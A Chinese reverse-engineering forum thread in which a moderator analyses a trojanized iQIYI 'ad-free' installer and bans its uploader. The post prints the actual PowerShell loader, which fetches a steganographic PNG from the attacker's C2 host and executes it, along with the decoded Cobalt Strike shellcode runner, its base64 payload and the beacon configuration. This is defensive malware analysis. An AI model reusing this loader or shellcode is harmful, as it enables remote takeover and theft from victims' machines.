吾愛破解 - LCG - LSG |安卓破解|病毒分析|huihengkj.com

 找回密碼
 注冊[Register]

QQ登錄

只需一步,快速開始

搜索
查看: 36392|回復: 619

BanID:zxj397298976【發布軟件捆綁Cobalt Strike遠控木馬】

    [復制鏈接]
樓主
Hmily 發表于 2020-9-29 14:54 回帖獎勵
BanID:zxj397298976【發布軟件捆綁Cobalt Strike遠控木馬】



今天早晨收到@cxj998 的舉報反饋被盜刷
愛奇藝 v7.8.118.2140 去廣告優化版-帶病毒
http://huihengkj.com/thread-1276263-1-1.html

我們著手分析一下看看軟件確實發現了問題,軟件利用白加黑啟動PowerShell腳本加載Cobalt Strike遠程控制木馬,用來控制受害者機器進行盜刷支付寶金額。


一:木馬行為分析
文件下載后發現使用了MSI打包,使用lessmsi解包(也可以正常安裝獲得文件)


解壓后通過文件修改時間順序排序,輕松發現最后修改的文件很可疑


通過經驗(也可以調試下得到)可以看出來App.dll(MD5: 17BD779769DBEC0B58966D066F656A72)加了VMP 2.x的殼是最可疑的了,Appdll.dll其實是正常的app.dll文件,顯而易見愛奇藝主程序會主動加載App.dll文件,木馬通過替換正常的DLL來做白加黑,所以看下App.dll的代碼就好了,vmp 2.x的老版本殼,直接用@ximo 大神的zeus vmp脫殼神器輕松脫掉(當然直接F9跑起來看也行),直接看下字符串只有一行代碼:cmd.exe /c powershell -exec bypass -f .\dataup.ps1 ,就是啟動根目錄下dataup.ps1(F409AE142DE9167CE4CD2B691F8A2A50),它是一個的PowerShell腳本。


重點到了dataup.ps1這,我們看下PowerShell腳本內容是:
[PowerShell] 純文本查看 復制代碼
sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://cs40a.microsoftup.pw/down/test22a.png"));$o=a Byte[] 5220;(0..2)|%{foreach($x in(0..1739)){$p=$g.GetPixel($x,$_);$o[$_*1740+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3546]))


這個腳本使用隱寫的方式,把代碼寫到png圖片里,根據腳本解密后的內容:
[PowerShell] 純文本查看 復制代碼
Set-StrictMode -Version 2
 
$DoIt = @'
function func_get_proc_address {
        Param ($var_module, $var_procedure)                
        $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
        $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
        return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
 
function func_get_delegate_type {
        Param (
                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
                [Parameter(Position = 1)] [Type] $var_return_type = [Void]
        )
 
        $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
        $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
 
        return $var_type_builder.CreateType()
}
 
[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSBycktEMiMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMe2FVbyPLm/M0T+9tiKiKeUGHZ8xtXX2ewq1PsRjmHxmKhrOBUMPrTQ8BzQXEcv96L0tUOUpZCXgC0KayN2Lt2wT5YLEtVDGGucs97+vRI3ZQRlEOYkRGTVcZA25MWUpPT0IMFw0TAwtATE5TQldKQU9GGANucGpmAxQNExgDdEpNR0xUUANtdwMWDRIYAw1tZncDYG9xAxENEw0WExQRFBgDDW1mdwNgb3EDEA0TDRMXFhMVDRATCi4pIw6UpTF1OBjAlT8DAB47//CyyzTsM+BmHocgmMR7DKE52SkaR+G2JTwk5zpgMV8GbPLeYNUr41CiqiJ2BsyQPAnVxMmQc3UhdPWqfNTLumBPH3OZgV72d94bYT6NEM2kQCtOIqSmcbULbvcpieEKbW5yEHfbGZXFK7v9qVsMQg1jjrx+76WkbIQNFQ1cyztF+kgQ8MACW1tZtz18nWGgA6IMlANij8b0bHH33qBDH0CU875iMbLzmdJdLzxfR5++gwkaDiNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcQFAXE0INTkpAUUxQTEVXVlMNU1QjMRd1Ww==')
 
for ($x = 0; $x -lt $var_code.Count; $x++) {
        $var_code[$x] = $var_code[$x] -bxor 35
}
 
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
 
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@
 
If ([IntPtr]::size -eq 8) {
        start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
        IEX $DoIt
}


根據經驗(調試多了就知道了),很像Cobalt Strike的PowerShell服務端腳本,從上面的Base64轉換然后和35(十進制)進行異或就得到了ShellCode,4KB大小,不出意外就是Cobalt Strike了,那我們繼續調試下這個ShellCode。

調試小技巧:比較簡單的辦法可以把ShellCode的二進制代碼直接復制出來,隨便找個無殼程序用OD加載,然后把二進制代碼從入口點粘貼覆蓋進行,就可以正常調試了(覆蓋后保存文件重新OD加載一下,這樣可以直接Ctrl+A分析下代碼)


通過經驗,看到ShellCode的API調用方式,再次印證就是Cobalt Strike了,調試過程略過(可以自己學習單步跟蹤嘗試一下),流程就是ShellCode去cs40a.microsoftup.pw請求獲取Beacon核心DLL進行內存解密加載


網絡獲取的Beacon核心代碼先進行自解密出PE,然后進行內存執行


小技巧:解密出PE以后可以直接把這個數據段dump下來,然后用ExeinfoPE來提取DLL




解密后的DLL通過LordPE查看導出模塊名稱確實是beacon.dll,再再一次印證就是Cobalt Strike了


有了Cobalt Strike的beacon.dll,那我們就看看它的木馬配置信息吧,簡單的辦法直接用6總的神器,在線解密Cobalt Strike配置信息,只需要把bin文件上傳即可獲得,解密網址:


File 4a8abb8f54fd4283af2fde919f923625bc3d6b998b215467ddc125d1b5d2823d receved !

BeaconType - HTTP
Port - 4455
SleepTime - 60000
MaxGetSize - 1048576
Jitter - 0
MaxDNS - 255
PublicKey - b'0\x81\x9f0\r\x06\t\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x81\x8d\x000\x81\x89\x02\x81\x81\x00\xa7\t\x91\xd6\x9d\x81j`\x1f\xfa\x80\x97ds\x83\x0f\r;A\'m\'\x90@\x1d\xde\xdb\x18\xe2\xd3\xca\xb3\xc3\x15\xe3"#%\xbeB\xb6Z\xdb(x\xf3?Z\x03\xffP\x10\xb2>\x84Q\x0c\x14\x82\xadjB\xf1\xe7\xe5rn\xb3\x18\x13\xe7Cv@\xedxy\x95_@\x1e\x17,4\xd3QrAYm\xd4\x1f\x8eH\xd3\xd1\xb1\xc2\x88\xe6\xc8u/\xf6]\xc2z\xcc\xcb\xa4\xba\x9c\xd6\xd0\xe4\xdea\x96\xce\xa4\xdaH\r;\x99\xd0\xed\x02\x03\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
C2Server - cs40a.microsoftup.pw,/activity
UserAgent - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
HttpPostUri - /submit.php
HttpGet_Metadata - Cookie
HttpPost_Metadata - Content-Type: application/octet-stream
id
SpawnTo - b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
PipeName -
DNS_Idle - 0.0.0.0
DNS_Sleep - 0
SSH_Host - Not Found
SSH_Port - Not Found
SSH_Username - Not Found
SSH_Password_Plaintext - Not Found
SSH_Password_Pubkey - Not Found
HttpGet_Verb - GET
HttpPost_Verb - POST
HttpPostChunk - 0
Spawnto_x86 - %windir%\syswow64\rundll32.exe
Spawnto_x64 - %windir%\sysnative\rundll32.exe
CryptoScheme - 0
Proxy_Config - Not Found
Proxy_User - Not Found
Proxy_Password - Not Found
Proxy_Behavior - Use IE settings
Watermark - 305419896
bStageCleanup - False
bCFGCaution - False
KillDate - 0
bProcInject_StartRWX - True
bProcInject_UseRWX - True
bProcInject_MinAllocSize - 0
ProcInject_PrependAppend_x86 - Empty
ProcInject_PrependAppend_x64 - Empty
ProcInject_Execute - CreateThread
SetThreadContext
CreateRemoteThread
RtlCreateUserThread
ProcInject_AllocationMethod - VirtualAllocEx
bUsesCookies - True
HostHeader -
Done!

C2的服務器地址:
cs40a.microsoftup.pw  (139.162.113.21)

當然了,有興趣的同學可以手動調試DLL來獲取配置信息和相關功能,我已經調試過很多次就不再贅述,關于Cobalt Strike木馬相關的文章也有不少,大家可以搜索學習,本文也是借此機會對Cobalt Strike其中一種ShellCode加載方式進行了分析講解,希望可以幫助到大家。

木馬下載地址以及相關文件MD5(解壓密碼:52pojie):
App.dll MD5: 17BD779769DBEC0B58966D066F656A72
dataup.ps1 MD5: F409AE142DE9167CE4CD2B691F8A2A50
shellcode MD5: DDFE4FA2341F59292BFBA48E30988831
Beacon.dll MD5: 50B9A5F1257F5F392D5415FED80904D7

樣本.rar (287.04 KB, 下載次數: 198)

二:溯源分析
通過C2域名非常眼熟,簡單搜索了下發現之前360安全衛士在6月份就發過相關的分析: ,原來是持續性作案,一直通過替換熱門軟件的DLL,進行白加黑啟動木馬來作案,最后通過各種方式進行大數據檢索定位到這位作案的朋友,過程略。。。

相關分析溯源已提交給支付寶安全中心、360安全中心,受害人也已報警,相關信息已提交公安,希望好生招待這位朋友。

三:后話
雖然論壇有很多高手,但我們希望提高所有人的安全意識和識別能力,看上述我的分析,你是不是也想來試試?

學會了之后,有能力分析出問題也可以幫助我們,盡快舉報,大家合力保衛論壇安全。

想對那些心懷不軌的人說,你在吾愛破解這樣的技術論壇玩這種小伎倆,分分鐘就給你剝皮把肉看得清清楚楚了,這里都是活躍在互聯網安全界的精英,任何小動作都是自討苦吃,奉勸那些蠢蠢欲動的人,盡快走入正途,不要誤入歧途!

最后感謝大家一直以來對吾愛破解論壇的支持和維護,論壇安全離不開大家監督,任何違法違規的行為都逃不過大家的眼睛和管理的審查,對待此類*渣論壇絕不手軟,堅決處罰到底!

免費評分

參與人數 888吾愛幣 +862 熱心值 +832 收起 理由
zhou3657 + 1 + 1 我很贊同!
暴力鳥 + 1 + 1 我很贊同!
CatVSDog + 1 我很贊同!
z88 + 1 + 1 我很贊同!
kaixiangyw + 1 + 1 我很贊同!
郟縣聽雨 + 1 我很贊同!
Sòng丶 + 1 + 1 我很贊同!
prontosil + 1 熱心回復!
Flyi + 1 + 1 謝謝@Thanks!
illegal_day + 1 謝謝@Thanks!
CheaterManager + 1 我很贊同!
電塔巨人 + 1 + 1 謝謝@Thanks!
放藥不放糖 + 1 + 1 用心討論,共獲提升!
yzycgs + 1 + 1 我很贊同!
ywp2425 + 1 謝謝@Thanks!
a328502750 + 1 + 1 謝謝@Thanks!
g44666 + 1 謝謝@Thanks!
lingchen_1990 + 1 + 1 謝謝@Thanks!
huakaizizai678 + 1 + 1 看不懂,但是必須支持
尚子望 + 1 謝謝@Thanks!
zym8058 + 1 + 1 鼓勵轉貼優秀軟件安全工具和文檔!
wjh823 + 1 + 1 謝謝@Thanks!
wd5601236 + 1 + 1 我很贊同!
azuoyo + 1 + 1 我很贊同!
fw4611 + 1 + 1 果然打鐵還需自身硬
wczlth + 1 + 1 謝謝@Thanks!
問天逍遙 + 1 + 1 我很贊同!
okyou345 + 1 + 1 我很贊同!
zzrr3 + 1 + 1 感謝您的寶貴建議,我們會努力爭取做得更好!
andyzzh + 1 + 1 我很贊同!
Lxm159357123 + 1 + 1 我很贊同!
ZhuangZ + 1 + 1 我很贊同!
哈哈哈的龍 + 1 + 1 我很贊同!
tangtie + 1 + 1 我很贊同!
一瞬三年五載 + 1 + 1 雖然看不懂,但一定要支持一下
Absinthhaha + 1 + 1 我很贊同!
沐月狐 + 1 我很贊同!
xcy0910 + 1 + 1 熱心回復!
jesse18 + 1 + 1 謝謝@Thanks!
sorrypqa + 1 + 1 謝謝@Thanks!
xiaohhdr + 1 + 1 謝謝@Thanks!
zxcv335 + 1 + 1 我很贊同!
靈魂歌手 + 1 + 1 我很贊同!
坦克總動員 + 1 + 1 謝謝@Thanks!
likongshun + 1 + 1 我很贊同!
夢旅意中人 + 1 謝謝@Thanks!帥阿!
281540013 + 1 + 1 感謝發布原創作品,吾愛破解論壇因你更精彩!
q135688cs + 1 + 1 我很贊同!
K_T~黑Q + 1 + 1 我很贊同!
Nernst + 1 + 1 用心討論,共獲提升!
Gry丶觴 + 1 + 1 用心討論,共獲提升!
zlxmlx + 1 + 1 歡迎分析討論交流,吾愛破解論壇有你更精彩!
zhaoxing + 1 + 1 謝謝@Thanks!
r20131214 + 1 + 1 我很贊同!
meridian + 1 我很贊同!
小霖霖 + 1 + 1 我很贊同!
lnron + 1 用心討論,共獲提升!
endcrash + 1 + 1 我很贊同!
pox730 + 1 我很贊同!
DonaldTrump + 1 + 1 我很贊同!
ch12 + 1 + 1 用心討論,共獲提升!
等待丘比特 + 1 + 1 謝謝@Thanks!
alexanderya + 1 + 1 謝謝@Thanks!
藍生 + 1 + 1 我很贊同!
liyou357 + 1 + 1 我很贊同!
陳未然 + 1 我很贊同!
myjasky + 1 + 1 謝謝@Thanks!
xiaotuxt + 1 + 1 我很贊同!
ctluoqf + 1 我很贊同!
wngliling + 1 + 1 我很贊同!
感冒牌抽紙 + 1 + 1 嚇得我安裝谷歌版,并充了個會員。
繆思蒙塵 + 1 + 1 用心討論,共獲提升!
asd9458 + 1 + 1 我很贊同!
metallbb + 1 + 1 用心討論,共獲提升!
dandaodaodan + 1 謝謝@Thanks!
52kg.cc + 1 我很贊同!
星星相惜d + 1 + 1 只能說牛逼走天下
chenshi930 + 1 + 1 謝謝@Thanks!
aspirejz + 1 + 1 我很贊同!
xy0526 + 1 + 1 我很贊同!
3to1 + 1 謝謝@Thanks!
飛舞的羽毛 + 1 + 1 謝謝@Thanks!
Cabbage-k + 1 + 1 歡迎分析討論交流,吾愛破解論壇有你更精彩!
種花家的小兔啊 + 1 + 1 我很贊同!
sysqjszg + 1 + 1 謝謝@Thanks!
不二小米 + 1 + 1 我很贊同!
1933420530 + 1 + 1
liowang + 1 + 1 謝謝@Thanks!
kgkgkg520 + 1 我很贊同!
qq6600559 + 1 + 1 我很贊同!
chen0779 + 1 第一次評分很激動,大哥你感動我了
tmgzy007 + 1 + 1 謝謝@Thanks!
a1255937642 + 1 + 1 我很贊同!
小小萊 + 1 + 1 謝謝@Thanks!
敢敢 + 1 + 1 謝謝@Thanks!
伽藍聽雨 + 1 + 1 我很贊同!
szqever + 1 + 1 謝謝@Thanks!
AAA馳少 + 1 + 1 我很贊同!
一克拉純真 + 1 + 1 我很贊同!
h0st + 1 太強了,教練我想學

查看全部評分

發帖前要善用論壇搜索功能,那里可能會有你要找的答案或者已經有人發布過相同內容了,請勿重復發帖。

推薦
 樓主| Hmily 發表于 2020-9-29 15:04 |樓主
yanglinman 發表于 2020-9-29 15:03
嚇得我不敢再轉發軟件了,自己的識別能力低,萬一那次碰上了,就玩完了,還是做一個安分守己的潛水者保險!

時至今日,你還不來學點技術嗎?搬運工有技術大拿帥嗎?

免費評分

參與人數 10吾愛幣 +8 熱心值 +9 收起 理由
suiyunfeng + 1 + 1 我很贊同!
跑跑的泡泡 + 1 不知道 如何入門學習
Gipors + 1 技術大拿最帥!!
時光稀釋 + 1 就一個字”帥“
大喃_ + 1 + 1 我很贊同!
xiafan + 1 + 1
forever880day + 1 + 1 我很贊同!
cxfyg + 1 + 1 我很贊同!
BFWJ-china + 1 + 1 我很贊同!
felixwang1024 + 1 + 1 我很贊同!

查看全部評分

頭像被屏蔽
推薦
yanglinman 發表于 2020-9-29 15:03
推薦
wyy81061 發表于 2020-9-29 15:10
推薦
RUI164605 發表于 2020-9-29 15:07
感謝版主及各位高手勤勉負責的態度
推薦
情誼 發表于 2020-9-29 15:21
我覺得對含有病毒帖子應該把關鍵信息隱去,留作存檔,給大家參考
推薦
濤之雨 發表于 2020-9-29 15:14

H大護體!百毒不侵!
推薦
Defender 發表于 2020-9-29 14:56
大家都檢查一下自己是否下載過,如果下載過盡快刪除文件,再進行殺毒吧。
推薦
iflower 發表于 2020-9-29 15:08
吃瓜群眾路過圍觀。
還好咱不用iqi藝看電影什么的,
白嫖雖好,但也要注意安全。

推薦
那年夏天52 發表于 2020-9-29 15:04
6的一批呀,鐵子
推薦
heidiansama 發表于 2020-9-29 15:09
H大真帥 我正在學powershell

點評

那正好試試解密下上面內容。  詳情 回復 發表于 2020-9-29 15:20
12#
wuai6757620 發表于 2020-9-29 14:59
大佬牛逼!!!!
13#
speedboy 發表于 2020-9-29 15:00
防不勝防啊
您需要登錄后才可以回帖 登錄 | 注冊[Register]

本版積分規則 提醒:禁止復制他人回復等『惡意灌水』行為,違者重罰!

快速回復 收藏帖子 返回列表 搜索

RSS訂閱|小黑屋|處罰記錄|聯系我們|吾愛破解 - LCG - LSG ( )

GMT+8, 2020-10-28 15:09

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回復 返回頂部 返回列表

500彩票邀請碼-彩經網